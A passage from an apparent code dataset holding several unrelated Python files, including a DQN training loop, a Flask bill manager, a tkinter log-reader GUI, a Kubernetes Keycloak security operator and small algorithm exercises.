CHANNEL_CAPACITY)\n else:\n channel_utilization.append((-np.log(reward[i] - 1)) / CHANNEL_CAPACITY)\n else:\n channel_utilization.append(0)\n\n\n # Training block starts\n ###################################################################################\n\n # sampling a batch from memory buffer for training\n batch = memory.sample(batch_size, step_size)\n\n # matrix of rank 4\n # shape [NUM_USERS,batch_size,step_size,state_size]\n states = get_states_user(batch)\n\n # matrix of rank 3\n # shape [NUM_USERS,batch_size,step_size]\n actions = get_actions_user(batch)\n\n # matrix of rank 3\n # shape 
[NUM_USERS,batch_size,step_size]\n rewards = get_rewards_user(batch)\n\n # matrix of rank 4\n # shape [NUM_USERS,batch_size,step_size,state_size]\n next_states = get_next_states_user(batch)\n\n # Converting [NUM_USERS,batch_size] -> [NUM_USERS * batch_size]\n # first two axes are merged into the first axis\n\n states = np.reshape(states, [-1, states.shape[2], states.shape[3]])# shape [NUM_USERS*batch_size, step_size, state_size]\n actions = np.reshape(actions, [-1, actions.shape[2]])# shape [NUM_USERS*batch_size, step_size]\n rewards = np.reshape(rewards, [-1, rewards.shape[2]])# shape [NUM_USERS*batch_size, step_size]\n next_states = np.reshape(next_states, [-1, next_states.shape[2], next_states.shape[3]])# shape [NUM_USERS*batch_size, step_size, state_size]\n\n # creating target vector (possible best action)\n target_Qs = sess.run(mainQN.output, feed_dict={mainQN.inputs_: next_states})# shape [NUM_USERS*batch_size, action_size]\n\n # Q_target = reward + gamma * Q_next\n targets = rewards[:, -1] + gamma * np.max(target_Qs, axis=1)# shape [NUM_USERS*batch_size, ]\n\n # calculating loss and train using Adam optimizer\n loss, _ = sess.run([mainQN.loss, mainQN.opt],\n feed_dict={mainQN.inputs_: states,\n mainQN.targetQs_: targets,\n mainQN.actions_: actions[:, -1]})# actions[:, -1].shape [NUM_USERS*batch_size,]\n\n loss_all.append(loss)\n\n if (time_step == 1000):\n plt.figure(1)\n\n print(\"Loss at (t=\"+ str(time_step) + \") = \" + str(loss))\n plt.subplot(311)\n plt.plot(loss_all, 'r-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Q Loss\")\n plt.title('TIME vs Loss')\n\n print(\"rewards at (t=\" + str(time_step) + \") = \" + str(sum_r))\n plt.subplot(312)\n plt.plot(total_rewards, 'b-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Total Rewards\")\n plt.title('TIME vs Total_Rewards')\n\n print(\"Utilization at (t=\" + str(time_step) + \") = \" + str(channel_utilization[time_step]))\n print(\"channel at (t=\" + str(time_step) + \") = \" + str(state[0:3]))\n print(channel_utilization)\n print(len(channel_utilization))\n plt.subplot(313)\n plt.plot(channel_utilization, 'g-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Channel_Utilization\")\n plt.title('TIME vs Channel_Utilization')\n\n plt.show()\n\n\n if (time_step % 60000 == 0 and time_step > 0):\n plt.figure(1)\n\n print(\"Loss at (t=\" + str(time_step) + \") = \" + str(loss))\n plt.subplot(311)\n plt.plot(loss_all, 'r-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Q Loss\")\n plt.title('TIME vs Loss')\n\n print(\"rewards at (t=\" + str(time_step) + \") = \" + str(sum_r))\n plt.subplot(312)\n plt.plot(total_rewards, 'b-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Total Rewards\")\n plt.title('TIME vs Total_Rewards')\n\n print(\"Utilization at (t=\" + str(time_step) + \") = \" + str(channel_utilization[time_step]))\n print(channel_utilization)\n print(len(channel_utilization))\n plt.subplot(313)\n plt.plot(channel_utilization, 'g-')\n plt.xlabel(\"TIME\")\n plt.ylabel(\"Channel_Utilization\")\n plt.title('TIME vs Channel_Utilization')\n\n plt.show()\n\n # guard against division by zero on the very first time-step\n if (time_step % 100 == 0 and time_step > 0):\n avg_loss.append(np.sum(loss_all) / time_step)\n avg_reward.append(np.sum(total_rewards) / time_step)\n avg_channel_utilization.append(np.sum(channel_utilization) / time_step)\n\n # Training block ends\n ########################################################################################\n\n # if time_step % 5000 == 4999:\n # plt.figure(1)\n # plt.subplot(211)\n # # plt.plot(np.arange(1000),total_rewards,\"r+\")\n # # plt.xlabel('Time Slots')\n # # plt.ylabel('total rewards')\n # # 
plt.title('total rewards given per time_step')\n # # plt.show()\n # plt.plot(np.arange(5001), cum_collision, \"r-\")\n # plt.xlabel('Time Slot')\n # plt.ylabel('cumulative collision')\n # # plt.show()\n #\n # plt.subplot(212)\n # plt.plot(np.arange(5001), cum_r, \"r-\")\n # plt.xlabel('Time Slot')\n # plt.ylabel('Cumulative reward of all users')\n # # plt.title('Cumulative reward of all users')\n # plt.show()\n #\n # total_rewards = []\n # cum_r = [0]\n # cum_collision = [0]\n # saver.save(sess, 'checkpoints/dqn_multi-user.ckpt')\n # # print time_step,loss , sum(reward) , Qs\n\n print(\"*************************************************\")\n\nsaver.save(sess, 'checkpoints/dqn_multi-user.ckpt')\n\nplt.figure(1)\nplt.subplot(311)\nplt.plot(avg_loss)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Loss\")\nplt.title(\"TIME vs Average Loss\")\nplt.subplot(312)\nplt.plot(avg_reward)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Reward\")\nplt.title(\"TIME vs Average Reward\")\nplt.subplot(313)\nplt.plot(avg_channel_utilization)\nplt.xlabel(\"TIME\")\nplt.ylabel(\"Average Channel Utilization\")\nplt.title(\"TIME vs Average Channel Utilization\")\nplt.show()\n\n\n\n\n\n\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":17127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"126314182","text":"N, A, B = map(int, input().split())\nans=0\nfor i in range(N):\n t = 0\n j = i+1\n while j != 0:\n t += j%10\n j //= 10\n if A <= t and t <= B:\n ans += i+1\n\nprint(ans)","sub_path":"work/atcoder/abc/abc083/B/answers/896331_rin1120.py","file_name":"896331_rin1120.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"485562221","text":"from flask import Flask, flash, session, request, redirect, render_template, url_for\nfrom db.data_layer import get_all_bills, get_bill, create_bill, delete_bill, update_bill\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n db_bills = get_all_bills()\n return render_template('index.html', bills=db_bills)\n\n@app.route('/add_bill', methods=['POST'])\ndef add_bill():\n description = request.form['html_description']\n amount = request.form['html_amount']\n create_bill(amount, description)\n return redirect(url_for('index'))\n\n@app.route('/edit_bill/')\ndef edit_bill(bill_id):\n db_bill = get_bill(bill_id)\n return render_template('edit.html', bill=db_bill)\n\n@app.route('/update_bill', methods=['POST'])\ndef update_bill_request():\n billid = request.form['html_id']\n description = request.form['html_description']\n amount = request.form['html_amount']\n update_bill(billid, amount, description)\n return redirect(url_for('index'))\n\n@app.route('/delete_bill/')\ndef delete_bill_request(bill_id):\n delete_bill(bill_id)\n return redirect(url_for('index'))\n\napp.run(debug=True)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"88213333","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 26 09:16:38 2017\n\n@author: daukes\n\"\"\"\n\nclass MaterialProperty(object):\n def __init__(self,name,color,thickness,E1,E2,density,poisson,is_adhesive,is_rigid,is_conductive,is_flexible):\n self.name = name\n self.color = color\n self.thickness = thickness\n self.E1 = E1\n self.E2 = E2\n self.density = density\n self.poisson = poisson\n self.is_adhesive = 
is_adhesive\n self.is_rigid = is_rigid\n self.is_conductive = is_conductive\n self.is_flexible = is_flexible\n def copy(self):\n return MaterialProperty(self.name,self.color,self.thickness,self.E1,self.E2,self.density,self.poisson,self.is_adhesive,self.is_rigid,self.is_conductive,self.is_flexible)\n @classmethod\n def make_n_blank(cls,n,thickness = 1,E1 = 1,E2 = 1,density = 1, poisson = 1,is_adhesive = False, is_rigid = False, is_conductive = False, is_flexible = False ):\n import numpy\n import matplotlib.cm\n cm = matplotlib.cm.plasma\n colors = numpy.array([cm(ii/(n-1)) for ii in range(n)])\n colors[:,3] = .25\n colors = [tuple(item) for item in colors] \n materials = []\n for ii,color in enumerate(colors):\n materials.append(cls('layer'+str(ii),color,thickness,E1,E2,density,poisson,is_adhesive,is_rigid,is_conductive,is_flexible))\n return materials\n \nclass JointProps(object):\n def __init__(self,stiffness,damping,preload,limit_neg,limit_pos,z_pos):\n self.stiffness = stiffness\n self.damping = damping\n self.preload = preload\n self.limit_neg = limit_neg\n self.limit_pos = limit_pos\n self.z_pos = z_pos\n\nclass DynamicsInfo(object):\n def __init__(self,connected_items,connections,newtonian_ids,material_properties):\n self.connected_items = connected_items\n self.connections = connections\n self.newtonian_ids = newtonian_ids\n self.material_properties = material_properties\n \n\nif __name__=='__main__':\n import yaml\n d = DynamicsInfo(1,2,3,4)\n with open('asdf.yaml','w') as f:\n yaml.dump(d,f)\n \n ","sub_path":"python/foldable_robotics/dynamics_info.py","file_name":"dynamics_info.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"291510257","text":"#!/usr/bin/env python\nfrom distutils.core import setup\n\nversion_tuple = __import__('pygvm').VERSION\nversion = \".\".join([str(v) for v in version_tuple])\n\nsetup(\n name='pygvm',\n description='''Simplified port of GVM for python. See http://www.tomgibara.com/clustering/fast-spatial/java-library for the original.''',\n version=version,\n author='Craig de Stigter',\n author_email='craig.ds@gmail.com',\n url='http://github.com/craigds/pygvm',\n packages=['pygvm', 'pygvm.libs'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"202269123","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n# Import the tkinter library for the GUI, datetime for timestamps and re for regular expressions\nimport datetime, re\nfrom tkinter import *\nfrom tkinter.messagebox import *\n\nclass Interface(Frame):\n\n\tdef __init__(self, master):\n\t\tFrame.__init__(self, master)\n\t\t\n\t\t\n\t\t# Introduction label\n\t\tpresentation = Label(master, text=\"Bienvenue! \\n\\nCet utilitaire a pour but de détecter les postes branchés sur un réseau, ainsi que de récupérer les différents logs des sessions d'utilisateur. \\nPour l'utiliser, saisissez une date dans la première zone de texte, puis une heure dans la seconde et cliquez sur 'Valider' pour lancer la recherche. \\n\\nPar défaut, la période sélectionnée se situera entre votre saisie et l'instant présent. 
\nSi vous le souhaitez, vous pouvez définir la fin de la période à scanner.\", fg = \"green\", bg = \"white\").grid(row = 0, column = 1, columnspan = 2)\n\t\t\n\t\t# Label #1\n\t\tL1 = Label(master, text = \"Début de la période (date):\", bg = \"white\").grid(row = 1, column = 1)\n\t\t\n\t\t# Input field #1 (date)\n\t\tcontent1 = StringVar()\n\t\tcontent1.set(\"AAAA-MM-JJ\")\n\t\t\n\t\tZ1 = Entry(master)\n\t\tZ1.grid(row = 1, column = 2)\n\t\tZ1[\"textvariable\"] = content1\n\t\t\n\t\t\n\t\t# Label #2\n\t\tL2 = Label(master, text = \"Début de la période (heure):\", bg = \"white\").grid(row = 2, column = 1)\n\t\t\n\t\t# Input field #2 (time)\n\t\tcontent2 = StringVar()\n\t\tcontent2.set(\"HH:MM\")\n\t\t\n\t\tZ2 = Entry(master)\n\t\tZ2.grid(row = 2, column = 2)\n\t\tZ2[\"textvariable\"] = content2\n\t\t\n\t\t\n\t\t# Label #3\n\t\tL3 = Label(master, text = \"Fin de la période (date):\", bg = \"white\").grid(row = 3, column = 1)\n\t\t\n\t\t# Input field #3 (date)\n\t\tcontent3 = StringVar()\n\t\tcontent3.set(datetime.datetime.now().strftime('%Y-%m-%d'))\n\t\t\n\t\tZ3 = Entry(master)\n\t\tZ3.grid(row = 3, column = 2)\n\t\tZ3[\"textvariable\"] = content3\n\t\t\n\t\t\n\t\t# Label #4\n\t\tL4 = Label(master, text = \"Fin de la période (heure):\", bg = \"white\").grid(row = 4, column = 1)\n\n\t\t# Input field #4 (time)\n\t\tcontent4 = StringVar()\n\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\n\t\tZ4 = Entry(master)\n\t\tZ4.grid(row = 4, column = 2)\n\t\tZ4[\"textvariable\"] = content4\n\n\n\t\t# Display the FAQ questions/answers\n\t\tdef Faq():\n\t\t\tshowinfo(\"FAQ\", \"Q: Quels sont les formats pour les paramètres à saisir?\\n\\nR: 'Année-Mois-Jour' pour les dates, 'Heure:Minutes' pour les heures; la ponctuation doit aussi être respectée.\\n\\t\\t\\t\\t\\t-------------\\n\\nQ: J'ai rentré mes paramètres, mais aucun résultat ne sort lorsque je valide.\\n\\nR: Le serveur syslog auquel l'application est connectée est soit inactif, soit mal configuré. 
Autrement, c'est parce qu'elle n'est connectée à aucun serveur.\")\n\n\t\t# Display information about this version of the application\n\t\tdef Apropos():\n\t\t\tshowinfo(\"A propos\", \"Nom de l'application: Outil de lecture réseau\\n\\nLangage utilisé: Python 3\\n\\nDéveloppeur: Rémi Kajak\\n\\nAvancée du projet: 80%\")\n\n\t\t# Validate the parameters before sending them to the script\n\t\tdef Verifenvoi():\n\t\t\n\t\t\t# Bind the regex match of each content variable to a local variable\n\t\t\tC1 = re.match(\"([0-9]{4})\\-([0-1][0-9])\\-([0-3][0-9])\", content1.get())\n\t\t\tC2 = re.match(\"([0-2]{0,1}[0-9])\\:([0-5][0-9])\", content2.get())\n\t\t\tC3 = re.match(\"([0-9]{4})\\-([0-1][0-9])\\-([0-3][0-9])\", content3.get())\n\t\t\tC4 = re.match(\"([0-2]{0,1}[0-9])\\:([0-5][0-9])\", content4.get())\n\t\t\n\t\t\t# If at least one field is empty\n\t\t\tif content1.get() == \"\" or content2.get() == \"\" or content3.get() == \"\" or content4.get() == \"\":\n\t\t\t\tshowwarning(\"Attention\", \"Un champ, au minimum, n'est pas rempli!\")\n\t\t\t\n\t\t\t# If the first two entries do not match the expected formats\n\t\t\telif C1 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"La date de départ n'est pas correcte!\")\n\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\n\t\t\telif C2 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"L'heure de départ n'est pas correcte!\")\n\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\n\t\t\t# If the last two entries do not match the expected formats\n\t\t\telif C3 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"La date de fin n'est pas correcte!\")\n\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\n\t\t\telif C4 == None:\n\t\t\t\tshowwarning(\"Erreur\", \"L'heure de fin n'est pas correcte!\")\n\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\t\n\t\t\t# If the period start date is later than the end date\n\t\t\telif content1.get() > content3.get():\n\t\t\t\tshowwarning(\"Erreur\", \"La première date dépasse la seconde date!\")\n\t\t\t\n\t\t\t# If both dates are the same\n\t\t\telif content1.get() == content3.get():\n\t\t\t\t# If the period start time is later than the end time\n\t\t\t\tif content2.get() > content4.get():\n\t\t\t\t\tshowwarning(\"Erreur\", \"La première heure dépasse la seconde heure!\")\n\t\t\t\t\n\t\t\t\t# If the start time equals the end time\n\t\t\t\telif content2.get() == content4.get():\n\t\t\t\t\tshowwarning(\"Attention\", \"La période que vous souhaitez scanner commence et se termine sur le même jour et la même heure!\")\n\t\t\t\t\n\t\t\t\t# Since the script stays in this branch on error, the submission is repeated here\n\t\t\t\telif content2.get() < content4.get():\n\t\t\t\t\t# Send the variables to the script\n\t\t\t\t\tif (askyesno(\"Succès\", \"Les valeurs sont correctes. 
Confirmer ces paramètres?\") == 1):\n\t\t\t\t\t\t# Valeurs à envoyer vers script.py\n\t\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tshowinfo(\"Confirmation\", \"Les informations ont été envoyées.\")\n\n\t\t\t\t\t# Sinon, on réinitialise les valeurs des contents\n\t\t\t\t\telse:\n\t\t\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\t\n\t\t\t# Toutes les conditions sont respectées.\n\t\t\telse:\n\t\t\t\t# Envoi des variables au script\n\t\t\t\tif (askyesno(\"Succès\", \"Les valeurs sont correctes. Confirmer ces paramètres?\") == 1):\n\t\t\t\t\t# Valeurs à envoyer vers script.py\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tshowinfo(\"Confirmation\", \"Les informations ont été envoyées.\")\n\n\t\t\t\t# Sinon, on réinitialise les valeurs des contents\n\t\t\t\telse:\n\t\t\t\t\tcontent1.set(\"201A-MM-JJ\")\n\t\t\t\t\tcontent2.set(\"HH:MM\")\n\t\t\t\t\tcontent3.set(datetime.datetime.now().strftime(\"%Y-%m-%d\"))\n\t\t\t\t\tcontent4.set(datetime.datetime.now().strftime(\"%H:%M\"))\n\t\t\n\t\t\n\t\t# Barre des onglets\n\t\tonglets_barre = Menu(master, bg = \"white\")\n\n\t\tonglet = Menu(onglets_barre, tearoff = 0)\n\t\tonglet.add_command(label = \"FAQ\", command = Faq)\n\t\tonglet.add_separator()\n\t\tonglet.add_command(label = \"A propos\", command = Apropos)\n\t\tonglets_barre.add_cascade(label = \"Aide\", menu = onglet)\n\t\t\n\t\tmaster.config(menu=onglets_barre)\n\n\t\t# Bouton \"Quitter\"\n\t\tbouton_quitter = Button(master, text = \"Quitter\", bg = \"white\", command = master.quit).grid(row = 5, column = 0)\n\n\t\t# Bouton \"Valider\"\n\t\tbouton_cliquer = Button(master, text = \"Valider\", bg = \"white\", command = Verifenvoi).grid(row = 5, column = 3)\n \t\n\n#Création de la fenêtre qui contiendra tous les composants graphiques\nfenetre_principale = Tk()\nfenetre = Interface(master = fenetre_principale)\n\nfenetre.master.title(\"Outil de lecture réseau\")\nfenetre.master.maxsize(1025, 240)\n\n# Afin que, lorsque le fichier est exécuté, la fenêtre puisse s'ouvrir\nfenetre.mainloop()\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":7259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"539290080","text":"#! 
/usr/bin/env python3\n#-*- coding: utf-8 -*-\n\nimport sqlite3\n\nclass Banco:\n def __init__(self):\n self.conexao = sqlite3.connect(\"banco\")\n \n def criar_tabela(self):\n self.conexao.execute(\"\"\"CREATE TABLE IF NOT EXISTS usuarios(\n id INTEGER PRIMARY KEY AUTOINCREMENT,\n nome TEXT,\n sobrenome TEXT,\n endereco TEXT\n );\n \"\"\")\n print(\"criado!\")\n\nBanco().criar_tabela()","sub_path":"introducao.py","file_name":"introducao.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"466114345","text":"'''\nA matrix is Toeplitz if every diagonal from top-left to bottom-right has the same element.\n\nNow given an M x N matrix, return True if and only if the matrix is Toeplitz.\n\n\nInput:\nmatrix = [\n [1,2,3,4],\n [5,1,2,3],\n [9,5,1,2]\n]\nOutput: True\n\n'''\n\n\ndef solution(m):\n for i in range(len(m) - 1):\n for j in range(len(m[0]) - 1):\n if m[i][j] != m[i + 1][j + 1]:\n return False\n return True\n\nmatrix = [\n [1,2,3,4],\n [5,1,2,3],\n [9,5,1,2]\n]\nprint(solution(matrix))","sub_path":"Easy/ Toeplitz_Matrix.py","file_name":" Toeplitz_Matrix.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"519187020","text":"import kopf\nimport logging\nimport os\nimport requests\nimport uuid\nimport datetime\nimport secconkeycloak\n\nfrom cloudevents.http import CloudEvent, to_structured\n\n# Helper functions ----------\n\n#def getToken(user: str, pwd: str) -> str:\n# \"\"\"\n# Takes the admin username and password and returns a session token for future Bearer authentication\n#\n# Returns the token, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to get the token from Keycloak\n# r = requests.post(kcBaseURL + '/realms/master/protocol/openid-connect/token', data = {\"username\": user, \"password\": pwd, \"grant_type\": \"password\", \"client_id\": \"admin-cli\"})\n# r.raise_for_status()\n# return r.json()[\"access_token\"]\n# except requests.HTTPError as e:\n# raise\n\n#def createClient(client: str, url: str, token: str, realm: str) -> None:\n# \"\"\"\n# POSTs a new client named according to the componentName for a new component\n#\n# Returns nothing, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to create the client in Keycloak\n# r = requests.post(kcBaseURL + '/admin/realms/'+ realm +'/clients', json={\"clientId\": client, \"rootUrl\": url}, headers={'Authorization': 'Bearer ' + token})\n# r.raise_for_status()\n# except requests.HTTPError as e:\n# # ! This might hide actual errors\n# # ! The keycloak API isn't idempotent.\n# # ! If a client exists it returns 409 instead of 201\n# # ! 
But why did we call createClient for a client that exists?\n# if e.response.status_code == 409:\n# pass # because the client (already) exists, which is what we want\n# else:\n# raise\n\n#def delClient(client: str, token: str, realm: str) -> bool:\n# \"\"\"\n# DELETEs a client\n#\n# Returns nothing, or raises an exception for the caller to catch\n# \"\"\"\n#\n# try: # to GET the id of the existing client that we need to DELETE it\n# r_a = requests.get(kcBaseURL + '/admin/realms/'+ realm +'/clients', params={\"clientId\": client}, headers={'Authorization': 'Bearer ' + token})\n# r_a.raise_for_status()\n# except requests.HTTPError as e:\n# logger.error(formatCloudEvent(str(e), f\"secCon couldn't GET ID for client {client} in realm {realm}\"))\n# raise\n#\n# if len(r_a.json()) > 0: # we found a client with a matching name\n# targetClient = r_a.json()[0]['id']\n#\n# try: # to delete the client matching the id we found\n# r_b = requests.delete(kcBaseURL + '/admin/realms/'+ realm +'/clients/' + targetClient, headers={'Authorization': 'Bearer ' + token})\n# r_b.raise_for_status()\n# except requests.HTTPError as e:\n# logger.error(formatCloudEvent(str(e), f\"secCon couldn't DELETE client {client} in realm {realm}\"))\n# raise\n#\n# else: # we didn't find a client with a matching name\n# # ! This might hide actual errors\n# # ! if the client doesn't exist the API call returns an empty JSON array\n# # ! But why did we call delClient for a client that didn't exist?\n# pass # because the client doesn't exist, which is what we want\n \ndef registerListener(url: str) -> None:\n \"\"\"\n Register the listener URL with partyRoleManagement for role updates\n\n Returns nothing, or raises an exception for the caller to catch\n \"\"\"\n\n try: # to register the listener\n r = requests.post(url, json = {\"callback\": \"http://seccon.canvas:5000/listener\"})\n r.raise_for_status()\n except requests.HTTPError as e:\n raise\n\ndef formatCloudEvent(message: str, subject: str) -> str:\n \"\"\"\n Returns a correctly formatted CloudEvents compliant event\n \"\"\"\n attributes = {\n \"specversion\" : \"1.0\",\n \"type\" : \"org.tmforum.for.type.event.an.invented.burton.brian\",\n \"source\" : \"http://seccon.canvas.svc.cluster.local\",\n \"subject\": subject,\n \"id\" : str(uuid.uuid4()),\n \"time\" : datetime.datetime.now().isoformat(),\n \"datacontenttype\" : \"application/json\",\n }\n\n data = {\"message\": message}\n\n event = CloudEvent(attributes, data)\n headers, body = to_structured(event)\n\n return body\n\n# Script setup --------------\nlogging_level = os.environ.get('LOGGING', logging.INFO)\nprint('Logging set to ', logging_level)\nlogger = logging.getLogger('SecurityOperator')\nlogger.setLevel(int(logging_level))\n\nusername = os.environ.get('KEYCLOAK_USER')\npassword = os.environ.get('KEYCLOAK_PASSWORD')\nkcBaseURL = os.environ.get('KEYCLOAK_BASE')\nkcRealm = os.environ.get('KEYCLOAK_REALM')\n\nkc = secconkeycloak.Keycloak(kcBaseURL)\n\n\n# Kopf handlers -------------\n\n\n# @kopf.on.resume('oda.tmforum.org', 'v1alpha2', 'components')\n@kopf.on.update('oda.tmforum.org', 'v1alpha2', 'components', field='status.deployment_status', value='Complete') # called by kopf framework when a component's status is updated\ndef securityClientAdd(meta, spec, status, body, namespace, labels, name, old, new, **kwargs):\n \"\"\"\n Handler for component create/update\n \"\"\"\n\n rooturl = 'http://' + spec['security']['partyrole']['implementation'] + '.' 
+ namespace + '.svc.cluster.local:' + str(spec['security']['partyrole']['port']) + spec['security']['partyrole']['path']\n logger.debug(f\"using component root url: {rooturl}\")\n logger.debug(f'status.deployment_status = {old} -> {new}')\n\n try: # to authenticate and get a token\n token = kc.getToken(username, password)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't GET Keycloak token\"))\n # without re-raising here, token would be unbound in the call below\n raise kopf.TemporaryError(\"Could not get Keycloak token. Will retry.\", delay=10)\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")\n\n try: # to create the client in Keycloak\n kc.createClient(name, rooturl, token, kcRealm)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), f\"secCon couldn't POST new client {name} in realm {kcRealm}\"))\n raise kopf.TemporaryError(\"Could not add component to Keycloak. Will retry.\", delay=10)\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n raise kopf.PermanentError(\"Could not determine Keycloak URL. Will NOT retry.\")\n else:\n logger.info(formatCloudEvent(f\"oda.tmforum.org component {name} created\", f\"secCon: component created\"))\n try: # to register with the partyRoleManagement API\n registerListener(rooturl + \"/hub\")\n except requests.HTTPError as e:\n logger.warning(formatCloudEvent(str(e), \"secCon couldn't register partyRoleManagement listener\"))\n statusValue = {'identityProvider': 'Keycloak', 'listenerRegistered': False}\n raise kopf.TemporaryError(\"Could not register listener. Will retry.\", delay=10)\n else:\n statusValue = {'identityProvider': 'Keycloak', 'listenerRegistered': True}\n \n return statusValue # the return value is added to the status field of the k8s object under securityRoles parameter (corresponds to function name)\n \n\n@kopf.on.delete('oda.tmforum.org', 'v1alpha2', 'components', retries=5) # called by kopf framework when a component is deleted\ndef securityClientDelete(meta, spec, status, body, namespace, labels, name, **kwargs):\n \"\"\"\n Handler to delete component from Keycloak\n \"\"\"\n\n try: # to authenticate and get a token\n token = kc.getToken(username, password)\n except requests.HTTPError as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't GET Keycloak token\"))\n # without re-raising here, token would be unbound in the call below\n raise kopf.TemporaryError(\"Could not get Keycloak token. Will retry.\", delay=10)\n except requests.URLRequired as e:\n logger.error(formatCloudEvent(str(e), \"secCon couldn't determine Keycloak URL\"))\n
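 # kopf semantics: TemporaryError re-queues the handler after the given delay,\n # while PermanentError marks it permanently failed -- no further retries\n raise kopf.PermanentError(\"Could not determine Keycloak URL. 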
Will NOT retry.\")","sub_path":"controllers/securityController/securityControllerKeycloak.py","file_name":"securityControllerKeycloak.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"453132820","text":"#!/usr/bin/env python2.7\n\nimport sys\nimport math\n\nimport matplotlib.animation as animation\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nfrom igraph import Clustering, compare_communities\nimport numpy as np\n\nfrom read_sim_data import *\n\n\ndef get_plot_data(i, time_intervals):\n t = time_intervals[i]\n ground_truth = Clustering([n.group for n in t.nodes])\n cc = Clustering([n.cc for n in t.nodes])\n return compare_communities(ground_truth, cc, method = \"danon\")\n\n\ndef plot(time_intervals):\n x = [t.end for t in time_intervals]\n data = [get_plot_data(i, time_intervals) for i in range(len(time_intervals))]\n line, = plt.plot(x, data, '-o')\n average = sum(data) / len(data)\n plt.ylim(0, 1.1)\n plt.title(\"Average clustering: \" + str(average))\n plt.show()\n\n\ndef main(argv=None):\n if argv is None:\n argv = sys.argv\n\n print(argv[1])\n plot(read_file(argv[1]))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scenarios/scripts/old_scripts/ground_truth_plot.py","file_name":"ground_truth_plot.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"220273025","text":"# coding=utf8\n#\n\n\nfrom unidecode import unidecode\nfrom django.template.defaultfilters import slugify\n\n\ndef test_slugify():\n value = unicode(unidecode(u\"中文\"))\n assert slugify(value) == \"zhong-wen\"\n print(\"Test Slugify Done\")\n\n\nif __name__ == '__main__':\n test_slugify()","sub_path":"redotc/tests/utils/test_slugify.py","file_name":"test_slugify.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"449550707","text":"from element import *\nimport numpy as np\n\n\nclass CreateBank(Element):\n def __init__(self, delay):\n super().__init__(name_element=None, delay=delay)\n self.priority = []\n\n def out_act(self):\n super().out_act()\n self.t_next[0] = self.t_curr + super().get_delay()\n next_queue = list()\n for i in range(len(self.next_element)):\n next_queue.append(self.next_element[i].queue)\n if len(self.priority) > 0:\n if max(next_queue) == 0:\n self.priority[0].in_act()\n elif len(self.probability) > 1:\n next_el = np.random.choice(a=self.next_element, p=self.probability)\n next_el.in_act()\n elif len(self.probability) == 1:\n way_id = next_queue.index(min(next_queue))\n self.next_element[way_id].in_act()\n elif len(self.priority) == 0 and len(self.probability) >= 1:\n next_el = np.random.choice(a=self.next_element, p=self.probability)\n next_el.in_act()\n\n @property\n def priority(self):\n return self.__priority\n\n @priority.setter\n def priority(self, value):\n self.__priority = 